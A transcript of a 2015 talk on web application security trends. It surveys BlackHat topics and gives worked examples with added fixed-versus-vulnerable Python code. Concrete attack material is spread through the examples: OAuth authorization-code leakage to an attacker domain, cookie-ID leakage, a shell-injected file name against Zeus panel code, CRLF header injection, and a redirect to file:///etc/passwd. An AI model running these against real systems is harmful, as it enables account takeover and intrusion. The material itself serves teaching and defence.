Web application security
trends
Omar Ganiev
28/02/2015
Hi!
I’m Beched, and I love hacking and solving problems.
Let’s look at the overall trends and at some recently
published papers, vulnerabilities and techniques
connected with web application security.
Classification
Questions to classify the vulnerabilities:
• Is the exploitation technique new or known?
• Is the attack target new or known technology?
• How large is a potential attack surface?
Sources of news
• Bug trackers, mailing lists
• https://blackhat.com/html/archives.html
• https://blog.whitehatsec.com/top-10-web-hacking-techniques-2013/
• https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
• …
Community opinion
• 30.77% of respondents from rdot.org will go
to dance a ballet, because web hacking is
gonna become way too complex =)
Obvious remarks
• Growing security awareness among developers
makes their code more secure
• At the same time, new products and
technologies are often released without a
careful security audit
• Old software is often considered safe and
trustworthy but contains severe vulnerabilities
• Business logic bugs are alive and well
Obvious remarks
• Infosec is part of CS and IT, and it inherits
global trends
• The global trend is a wide spread of various
gadgets and mobile devices
• The global trend is making houses and
vehicles smart
• The global trend is making web interfaces rich
and self-contained in the browsers
Take a look
• There are loads of papers and presentations in the BlackHat
archives. If we filter those connected with web security
and rank the topics, we get the following scoreboard
of trends:
• client-side && mobile
• clouds && big data && social networks
• misc && classic
• TLS && SSL
• IoT && routers
• PRNG && SSRF && etc
• old soft
Client-side && Mobile
• Known technologies, new life
• There’re loads of papers on client-side security
• Loads of bug bounties are given for XSS or
something like that
• There’re a lot of tricky techniques, and we can
see a long war between browser developers and
XSS hunters
• Mobile browsers are also targeted. Some mobile
OS interfaces are HTML5-based, which increases
impact of XSS
Client-side && Mobile
DISSECTING CSRF ATTACKS & COUNTERMEASURES
JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME
MILLION BROWSER BOTNET
PIXEL PERFECT TIMING ATTACKS WITH HTML5
ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS
CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY
THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT
CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING
REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR
REVISITING XSS SANITIZATION
SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS
SESSION IDENTIFIERS ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS
TWO FACTOR FAILURE
THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES
JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY
UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED
ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
Client-side && Mobile
• UXSS, MXSS
• ChromeOS, FirefoxOS
• Browser extensions hacking
• Endless security features vs bypass war
• XSS Auditor, CSP, HttpOnly, SOP, CORS
• Funny things like RFD (reflected file download)
• OAuth bugs
Example
• Chrome’s XSS Auditor breaks a lot of attacks, but in most cases it
can be bypassed, or at least the attack can be modified
• The idea is that it looks for the complete dangerous tags or attributes
of the response page inside the HTTP request (URL and body), and only
blocks script-bearing markup that appears verbatim in the request
• There are plenty of bypasses, take a look at
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/
http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/
https://www.blackhat.com/docs/us-14/materials/us-14-Johns-Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side-XSS-Filtering.pdf
Example
• Other bypasses include CSRF token leakage, form target
forgery, etc.
Example
• A secure CMS and XSS Auditor can both be spoiled by
plugins
• Look at this typographic plugin for Drupal:
var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); // .text() returns the element’s text HTML-decoded
$(this).after(result).remove(); // .after() parses its argument as HTML
• The jQuery method after() is an HTML sink: the div
contents are read back HTML-decoded and re-inserted as
markup, so any reflected or stored <script> that the server
had safely escaped becomes active, and XSS Auditor has nothing
to block because the raw tag never appeared in the response
Example
• OAuth providers are often vulnerable to open redirect due to
lack of redirect_uri validation; here the check apparently only
demands that the redirect_uri host start with the client’s
registered host, so an attacker-controlled domain passes:
https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&scope=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257
After authorization it redirects to:
http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85458d0db1c65792d52c8bef3c4407374b2
• The leaked authorization code is enough for account
takeover: the attacker submits it to the client’s own login
endpoint in place of the victim
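The redirect_uri check above, as an added example written for this page (not the provider’s code from the slide): a prefix match on the host, which is what the *.ru.incsecurity.ru trick defeats, beside an exact match against the registered redirect URIs. The client registry and the hostnames are constructed; only the client_id is taken from the slide.

```python
"""Added example: naive vs. strict redirect_uri validation at an OAuth
authorization endpoint. Illustrative code written for this page, not the
provider's code; the client registration below is constructed (only the
client_id comes from the slide)."""
from urllib.parse import urlsplit

CLIENT_ID = "4f81a884015911e2b24a6c626d99879c"

# Constructed registry: client_id -> exact pre-registered redirect URIs.
REGISTERED_REDIRECTS = {
    CLIENT_ID: ["https://client.example.ru/oauth/callback"],
}


def validate_naive(client_id: str, redirect_uri: str) -> bool:
    """The check the slide's example defeats: the redirect host only has to
    *start with* the registered host, so client.example.ru.incsecurity.ru
    (an attacker-controlled domain) is accepted."""
    host = (urlsplit(redirect_uri).hostname or "").lower()
    for registered in REGISTERED_REDIRECTS.get(client_id, []):
        if host.startswith((urlsplit(registered).hostname or "").lower()):
            return True
    return False


def _canonical(uri: str) -> str:
    """Scheme, host[:port], path and query in a comparable form."""
    u = urlsplit(uri)
    canon = f"{u.scheme.lower()}://{u.netloc.lower()}{u.path or '/'}"
    return canon + (f"?{u.query}" if u.query else "")


def validate_strict(client_id: str, redirect_uri: str) -> bool:
    """Exact match against the registered redirect URIs (RFC 6749 sec. 3.1.2.2):
    no prefix or suffix matching, no fragment, https only."""
    u = urlsplit(redirect_uri)
    if u.scheme.lower() != "https" or u.fragment:
        return False
    wanted = _canonical(redirect_uri)
    return any(_canonical(r) == wanted
               for r in REGISTERED_REDIRECTS.get(client_id, []))


def authorize(client_id: str, redirect_uri: str, code: str,
              validator=validate_strict) -> str:
    """Where the authorization code ends up: the Location the provider sends
    the user to after login. With a weak validator this is the attacker's host."""
    if not validator(client_id, redirect_uri):
        raise ValueError("redirect_uri does not match the client registration")
    sep = "&" if "?" in redirect_uri else "?"
    return f"{redirect_uri}{sep}code={code}"
```

With validate_naive the attacker’s http://client.example.ru.incsecurity.ru/ receives the code; with validate_strict the request is refused before any code is issued. Suffix checks ("ends with the registered domain") and substring checks fail the same way, just with a different attacker hostname.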
Clouds && Big data && Social networks
• Fairly new technologies
• Cloud computing and machine learning are
heavily used for different purposes
• As for infosec, this can be used both for attack
and defense
• Social networks and big data providers can be
exploited for deanonymization and fraud
• Machine learning can be used for building WAF
Clouds && Big data && Social networks
PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER
USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER
WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS
BIG DATA FOR WEB APPLICATION SECURITY
FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC
PIVOTING IN AMAZON CLOUDS
BRINGING A MACHETE TO THE AMAZON
BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE
SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING
BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS
HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT
HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
Example
• Post-exploitation of distributed web applications is
often a bit tricky: you don’t know exactly which
node will process your request
• Nodes can often be enumerated via HTTP response
headers or cookies
• Sometimes some nodes are not updated and still contain
vulnerabilities
• This creates mind-blowing phantom vulnerabilities that
show up only when a request happens to hit an unpatched node =)
• Take a look at this cool talk about Amazon EC2 post-exploitation:
https://www.blackhat.com/docs/us-14/materials/us-14-Riancho-Pivoting-In-Amazon-Clouds.pdf
Example
• Data providers are often used for targeted
marketing. However, their data can sometimes be
stolen and used for deanonymisation or fraud.
This is a documented API request:
https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=http://incsecurity.ru/?adv_id=$UID
• $UID is replaced with the actual cookie value by
the server, and the user is sent to the attacker’s host with it
• Information about the user can then be obtained via JSONP
hijacking, even if the session id is checked
Example
• Request:
https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st=1
• The response contains information about gender, interests, etc. Part of
the interests description file:
…
{
"id": "40010082",
"segment": "Fetish & Bondage",
"category": "Interests",
"section": "Interests",
"description": ""
}
…
Misc & Classic
• There are a lot of works which continue previous
research and bug reports
• They improve exploitation of classical
vulnerabilities like SQL injection, and
testing/analysis methods
• The rise of the penetration testing industry
pushed up demand for .NET and J2EE
application hacking methods
Misc & Classic
') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES')%00
INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA
CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS
FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS
I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS
WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS!
SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
Example
• The paper about hacking C&C panels reminded
me of the RCE vulnerability in the Zeus C&C, which I
published around 2010. I opened these links now:
http://ahack.ru/bugs/zeus-vulnerability-exploit.htm
https://github.com/Visgean/Zeus/
• Guess what I still see there, five years later? ;)
Example
• The name of the function has changed, but the vulnerability is still there,
AFAICS
...
function fsarcCreate($archive, $files)
...
// $files comes straight from $_POST['files']; a single " in a file name
// closes the quoting, and exec() hands the whole string to /bin/sh
$cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
exec($cli, $e, $r);
...
foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; // no sanitisation of $file at all
...
if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.');
...
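The same construction in Python, as an added example written for this page (not the panel’s PHP): the concatenated command string beside an argv-based replacement that never touches a shell. The archive and file names are constructed; shlex with punctuation handling only approximates what /bin/sh would do, which is enough to make the injected ";" visible.

```python
"""Added example: the command injection behind the fsarcCreate() pattern and
an argv-based replacement. Illustrative Python written for this page, not
the panel's PHP; archive and file names below are constructed."""
import shlex
import subprocess

ZIP_OPTS = ["-r", "-9", "-q", "-S"]


def build_zip_cmd_vulnerable(archive: str, files: list) -> str:
    """Same construction as the PHP: one command string, file names wrapped
    in double quotes by concatenation, destined for exec() (i.e. a shell)."""
    opts = " ".join(ZIP_OPTS)
    return f'zip {opts} "{archive}" "' + '" "'.join(files) + '"'


def shell_words(cmd: str) -> list:
    """Approximate the tokens a POSIX shell sees; punctuation_chars makes
    ';', '|', '&' etc. come out as separate tokens instead of word content."""
    return list(shlex.shlex(cmd, posix=True, punctuation_chars=True))


def build_zip_cmd_safe(archive: str, files: list) -> list:
    """An argv list: each file name is exactly one argument whatever it
    contains, and nothing is parsed by a shell. Option-like names and path
    escapes are rejected up front because zip itself would interpret them."""
    for name in [archive, *files]:
        if name.startswith("-") or name.startswith("/") or ".." in name.split("/"):
            raise ValueError(f"refusing file name {name!r}")
    return ["zip", *ZIP_OPTS, archive, *files]


def create_archive(archive: str, files: list) -> int:
    """Run zip without a shell; returns its exit status (needs zip installed)."""
    return subprocess.run(build_zip_cmd_safe(archive, files), check=False).returncode
```

For the file name x"; id; " the string built by build_zip_cmd_vulnerable tokenises as zip ... "x" ; id ; "", so the shell runs id after zip; build_zip_cmd_safe passes the same name to zip as one literal argument. The $_CUR_PATH.'/'.$file line in the panel has the separate problem that ../ is never stripped, which the name check above also covers.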
Example
• This is a small example, and there are probably more critical
vulnerabilities in this popular botnet C&C. BTW, how
do you find vulnerabilities in source code?
• The paper on contemporary automatic program analysis
mostly talks about grep =)
• Personally I use grep with lovely regular expressions (PCRE, i.e. grep -P),
for instance this one for include/require statements whose argument contains
a variable and is not wrapped in a function that cannot return an attacker-chosen path:
\w*(include|require)(_once)?[\s(]+(?!\s*('[^']*'|"[^"]*"|)[@\s.]*(urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|floatval|round|hexdec)\s*\()[^;]*\$.*
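The grep heuristic above, run from Python over a few constructed PHP lines, as an added example written for this page. The pattern is the slide’s regex with the backslashes that the transcript lost restored, which is an assumption about the original; the PHP sample is made up and shows both a hit the heuristic gets right and a false positive it produces.

```python
"""Added example: the slide's grep heuristic for dynamic include/require
statements, run from Python over constructed PHP lines. Written for this
page; the regex is the slide's with dropped backslashes restored (an
assumption about the original), and SAMPLE_PHP is made up."""
import re

# Functions whose return value an attacker cannot steer into a path of their
# choosing (the slide's list); an include wrapped in one of them is skipped.
SAFE_FUNCS = (
    "urlencode|rand|rawurlencode|basename|levenshtein|doubleval|sizeof|"
    "base64_encode|strlen|floor|crypt|strrpos|filter_input|abs|bin2hex|bindec|"
    "hash|intval|max|decbin|strpos|crc32|ord|md5|count|sha1|min|pathinfo|"
    "floatval|round|hexdec"
)

DYNAMIC_INCLUDE = re.compile(
    r"\w*(include|require)(_once)?[\s(]+"                  # the statement
    + r"""(?!\s*('[^']*'|"[^"]*"|)[@\s.]*(""" + SAFE_FUNCS  # unless a "safe" call
    + r""")\s*\()"""                                         # comes first
    + r"[^;]*\$.*"                                           # a variable before ';'
)


def find_dynamic_includes(php_source: str) -> list:
    """Return (line number, line) for every line the heuristic flags."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if DYNAMIC_INCLUDE.search(line):
            hits.append((lineno, line.strip()))
    return hits


# Constructed PHP: lines 3 and 5 are real file-inclusion candidates, 2, 4 and
# 6 are safe, and 7 is safe too (intval) but still flagged because the
# regex only skips a "safe" call that is the first thing after the bracket.
SAMPLE_PHP = """<?php
require_once 'config.php';
include($_GET['page'] . '.php');
include('/inc/' . basename($_GET['f']));
include $tpl;
include(md5($name) . '.php');
require_once(DIR . '/lib/' . intval($_GET['id']) . '.php');
"""
```

The equivalent on the command line is grep -rnP with the same pattern over the source tree; expect the line-7 kind of false positive, and remember that it is a one-line heuristic, so multi-line statements and includes built from variables assigned earlier are not caught.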
Example
• 2014 has gone and here comes 2015, but PHP
and Apache are still broken
• Several UAF vulnerabilities in PHP were fixed
recently, but a lot of restriction bypasses and
RCE vulnerabilities still live deep in there
• Apache has not yet learnt the RFCs
• Other popular miscellaneous words among
hackers: NoSQL, SSJS, SCADA, SAP
TLS && SSL
• As old as the world
• There’re still a lot of misconfiguration issues
with HTTPS
• Also there’re a lot of scary words like BEAST,
CRIME, BREACH, HeartBleed, POODLE,
SSLStrip and others
• Many configuration mistakes are result of
trade-off between performance and security
TLS && SSL
SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME
TLS 'SECRETS'
TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS
A PERFECT CRIME? ONLY TIME WILL TELL
THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP
BYPASSING HTTP STRICT TRANSPORT SECURITY
IoT && Routers
• This is one of the most popular new IT trends
everyone heard about
• New means untested. Untested means
vulnerable
• Seriously, the Internet of things is broken, and
many yell about it
• People hack RF protocols of alarms, people find
smart houses without doors via Shodan, etc,
etc
IoT && Routers
EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER
HOME INVASION V2.0 - ATTACKING NETWORK-CONTROLLED HARDWARE
A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES
ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS
OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
Example
• Just look at this: [screenshot, not reproduced in this transcript]
• And this: [screenshot, not reproduced in this transcript]
• And this (admin;admin): [screenshot, not reproduced in this transcript]
Example
• BTW, a side note: why doesn’t XSS Auditor
perform an HTTP response splitting check?
• As you could see on the screenshot above,
response splitting kills XSS Auditor: once we can
inject a CRLF into a response header, we can add the
header X-XSS-Protection: 0, and the browser switches
the auditor off for that very response
PRNG && SSRF && etc
• XXE, SSRF and randomness hacking were hot
topics of 2012-2013
• They are popular today too, new applications
and attack vectors are developed
PRNG && SSRF && etc
BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS
XML OUT-OF-BAND DATA RETRIEVAL
THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS
ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
Example
• The Autodiscover interface of OWA reveals an internal
IP address of the mail server
• The ev.owa interface with the cPfdDC parameter can be
used to make the server send LDAP requests to, and connect to,
hosts of your choice (as “domain controllers”):
Microsoft.Exchange.Data.Directory.SuitabilityVerifier.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential)
• If there were a bypass for the anti-CSRF canary, you
could possibly steal NTLM credentials this way
Example
• The vBulletin forum CMS allows uploading attachments
from a remote URL (class_upload.php,
class_vurl.php)
• It first checks the file size with a HEAD request, then
downloads the file with a second request
• You can use an HTTP multiplexer to exploit this race
condition: return 200 and a valid file size for the
first request and a 302 redirect for the second one
• Some configuration options and old versions of
cURL follow a file:// URL in the Location header, which
turns the download into a read of a local file
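The HEAD-then-GET race modelled in Python, as an added example written for this page. The server class is a constructed in-memory stand-in for the attacker’s host that answers the size check and the download differently; it is neither vBulletin nor cURL code, and the fetch functions only show the control flow that matters: a separate check request, and redirects followed without re-validating the scheme.

```python
"""Added example: the HEAD-then-GET race behind the vBulletin remote-upload
issue, modelled in Python. Written for this page: FlipFlopServer is a
constructed in-memory stand-in for an attacker's host, not real vBulletin or
cURL behaviour."""
from urllib.parse import urlsplit

MAX_BYTES = 1_000_000
ALLOWED_SCHEMES = ("http", "https")


class FlipFlopServer:
    """Answers the first `ok_answers` requests with 200 and a small
    Content-Length, then switches to a 302 pointing at a file:// URL."""

    def __init__(self, ok_answers: int, target: str = "file:///etc/passwd"):
        self.ok_answers = ok_answers
        self.target = target
        self.hits = 0

    def request(self, method: str, url: str):
        self.hits += 1
        if self.hits <= self.ok_answers:
            return 200, {"Content-Length": "1024"}, b"GIF89a..."
        return 302, {"Location": self.target}, b""


def fetch_vulnerable(server, url: str) -> str:
    """HEAD for the size, then GET and follow whatever Location comes back:
    a time-of-check/time-of-use gap, plus no scheme check on redirects."""
    status, headers, _ = server.request("HEAD", url)
    if status != 200 or int(headers.get("Content-Length", "0")) > MAX_BYTES:
        raise ValueError("size check failed")
    status, headers, _ = server.request("GET", url)
    if status in (301, 302, 303, 307):
        url = headers["Location"]          # followed blindly, file:// included
    return url                             # the URL that actually gets read


def fetch_safe(server, url: str, max_hops: int = 3) -> str:
    """One GET per hop, scheme re-validated on every hop, size enforced on
    the response that carries the body (no separate HEAD to race against)."""
    for _ in range(max_hops):
        if urlsplit(url).scheme.lower() not in ALLOWED_SCHEMES:
            raise ValueError(f"refusing {url!r}: scheme not allowed")
        status, headers, body = server.request("GET", url)
        if status in (301, 302, 303, 307):
            url = headers["Location"]
            continue
        if status != 200:
            raise ValueError(f"unexpected status {status}")
        if int(headers.get("Content-Length", "0")) > MAX_BYTES or len(body) > MAX_BYTES:
            raise ValueError("too large")
        return url
    raise ValueError("too many redirects")
```

In real cURL-based code the scheme restriction is CURLOPT_PROTOCOLS together with CURLOPT_REDIR_PROTOCOLS (curl’s --proto and --proto-redir) limited to http and https; the size limit belongs on the streamed body, not on a separate request; and the same per-hop check is the place to reject private and link-local addresses, since the redirect trick is equally usable for SSRF.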
Old soft
• We’ve witnessed several critical vulnerabilities
in well-known and widely used software in
2014
• HeartBleed, GHOST, ShellShock, POODLE, goto
fail, etc
• Probably it’s an important moment, when we
stop trusting and begin reviewing all the
fundamental old software that we use
everywhere
Old soft
EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD
SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
Example
• Although these famous vulnerabilities are not
caused by web applications, they deeply affect
them
• ShellShock and GHOST affect webapp<->OS
interaction layer
• HeartBleed, goto fail, POODLE, affect mainly
webapp<->encryption<->network interaction
layer
Example
• This is one more proof that we should not
consider any part of the software as trusted.
Each component of the system can be broken
• BTW, journalists also started the era of
nicknames for vulnerabilities
• I find this a bit ridiculous but funny =)
Summary
• The Internet is broken
• The WWW is broken
• Hackers gonna hack
• Web applications become smarter
• Hacking becomes smarter
Questions?
beched@incsecurity.ru
